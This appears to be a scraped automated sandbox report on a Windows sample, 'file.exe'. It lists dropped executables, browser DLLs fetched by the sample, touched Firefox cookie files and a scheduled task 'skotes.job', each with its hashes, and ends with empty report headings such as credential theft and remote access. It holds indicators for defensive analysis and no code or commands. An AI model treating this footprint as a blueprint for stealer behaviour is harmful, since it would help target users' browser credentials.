C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675355FC-D60.pma	data	E654B6EDD1FD2D97A4C6B869BD778B77	52C3613AB3E76B21B951148C2864E817FA416164	937A4C33A7360D68DDCE5B22D4E04FAF2A31F44F95614DD9EED50B199D2844D5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat	data	6F31F66D322746DFA960845F4C4E8A15	22CC9EAF87C966CAFF2E6C568C1D31FBBF9ABE8D	DE611AF9189D0C1CC631F9406C71D9950AC6EDA7B4EC10456D68BF55A0B54B25
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version	ASCII text, with no line terminators	BF16C04B916ACE92DB941EBB1AF3CB18	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF273de.TMP (copy)	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF273ee.TMP (copy)	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27f57.TMP (copy)	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27f67.TMP (copy)	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations	JSON data	265DB1C9337422F9AF69EF2B4E1C7205	3E38976BB5CF035C75C9BC185F72A80E70F41C2E	7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\abadaef3-e639-4d9e-abff-da1553887207.tmp	JSON data	8C3B1AE01E5CC85B6591049E2825C2A7	58257E1F7EF9CFE677721A171E151B4231012E0A	1883CB8ECFF8DB2DCCC8EB405D44851C5AFFD7AB539BFE375688ADA3535A8884
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ce802594-fc29-4d6e-beff-ea7971ae8120.tmp	JSON data	26AC37B1E917761F8FA78F57FB144407	84BF1B45ABD77490B2DDB707B246DB5BA159C8BE	28FF5977D7BBC5031D2A3362DEC39466015533E88200D3C4C13440BBACEEAEF4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	942924035D1C2C06233E98F67DBB35EF	003C78601472AE80B24CE4B56965A0777345F1D5	582FF3A8D8EE9E192F9E7F0DB33E387669A45016E84371B729A5E75E688C068D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json	JSON data	292681531F960DD3BB0162E87AE8CB77	9EE0CC1209D33D95032E800FF54525487EDE9EF3	AD6E5EEEB5D747FA3AC49CE1C6CB7A9AD6553E177C214682A88D95F1B4AF9430
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	6B60304F8778EFBD0E4B1970F4B129D1	193BF21CC059EF36F50BED6941452F9B59A643AC	2A880E72D8DCECFD86D384AE070D73AB9DFC48C2B31EFAC464DD483482D31808
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	PE32 executable (GUI) Intel 80386, for MS Windows	942924035D1C2C06233E98F67DBB35EF	003C78601472AE80B24CE4B56965A0777345F1D5	582FF3A8D8EE9E192F9E7F0DB33E387669A45016E84371B729A5E75E688C068D
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	PE32 executable (GUI) Intel 80386, for MS Windows	6B60304F8778EFBD0E4B1970F4B129D1	193BF21CC059EF36F50BED6941452F9B59A643AC	2A880E72D8DCECFD86D384AE070D73AB9DFC48C2B31EFAC464DD483482D31808
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 18:52:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	B68EC5D58EA6CD4380A1FAF6EC317353	74D3692523F5511B6416CD638DEB3D4A8A6ABD31	F2AB43B2E5B059865E80375DCE45A5415AEC49A66BE108DB989660AA5960D9E9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 18:52:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	F8EBF96E7FC8FFE73F140E928CB8C756	3238D3FBC22DBE470C6A7F2E1E76476B3464D30B	82C08C6B325EBA4F5302E9841C23202482B03D8190650D6AA973226174CFDF43
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	BE1521FC74738D4C1851D17AD424206B	5C265C196308002718A379665207DAF161B0F6C0	05765A51C450467989FD9EE03C32E0D1C562E0A1A01F863744C3B88AD183A17D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 18:52:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	6A840AFFEA471E86D23611180FD271AB	F86718387461BCBC45D4A88987E16B9BFF21696A	727D46FA18AE0ADF3DFDC315A96CBF25B110CD6201F99A91FE36F71569B5ACBB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 18:52:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	79D61600A393B96E4B6397539AFF5A0F	D4CD841116ED970D2161459A6E049868364DCA9E	128AC7E0FE8880DFA442B63CD07F67916F99CBCFCD186974051147199E9CBB3F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 18:52:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	12FDD5C726833CCC08DE50CF007CD772	90D4706EE69669D6BA9DCB3C67554B9D5B994FCC	9444E34376B5F30701EE57DDB3558E789F60CB0FF92FC66F0CE4FCB7E3A1CAA5
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\Documents\KJJJKFIIIJ.exe	PE32 executable (GUI) Intel 80386, for MS Windows	6B60304F8778EFBD0E4B1970F4B129D1	193BF21CC059EF36F50BED6941452F9B59A643AC	2A880E72D8DCECFD86D384AE070D73AB9DFC48C2B31EFAC464DD483482D31808
C:\Windows\Tasks\skotes.job	data	34D3E826CBB2DFCE142008674E2ADCAC	CC4CF07A87E2427C44513FCF3D5A87A2EFCE224C	8EFC63C5601D9B70F3022BB4252085BC3D7A26E7B877072F4DC4038BCFBE14C4
Chrome Cache Entry: 105	ASCII text, with very long lines (2412)	E51B78D04BF7FEADF2B7281088079FD5	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
Chrome Cache Entry: 106	ASCII text, with very long lines (837)	462F64D10D5E5F673487ED3E4BA0AC30	B9039F3A739829D01A884253FFA79CC233B47D19	9E65133EACF85421E9344B6BEE8E8DB6D81C262BF424254C2A601861A511E3BC
Chrome Cache Entry: 107	ASCII text	6FED308183D5DFC421602548615204AF	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
Chrome Cache Entry: 108	ASCII text, with very long lines (65531)	292724A422E78E419F23AADD2888140C	24DF8DC85CCB44427F7F31C152FA5602FB104935	6689B72C1A40D89DB03A0A05C00533E9758E8E6BD81C8781A43450DFDD51E823
Chrome Cache Entry: 109	ASCII text, with very long lines (5162), with no line terminators	7977D5A9F0D7D67DE08DECF635B4B519	4A66E5FC1143241897F407CEB5C08C36767726C1	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
Chrome Cache Entry: 110	SVG Scalable Vector Graphics image	554640F465EB3ED903B543DAE0A1BCAC	E0E6E2C8939008217EB76A3B3282CA75F3DC401A	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by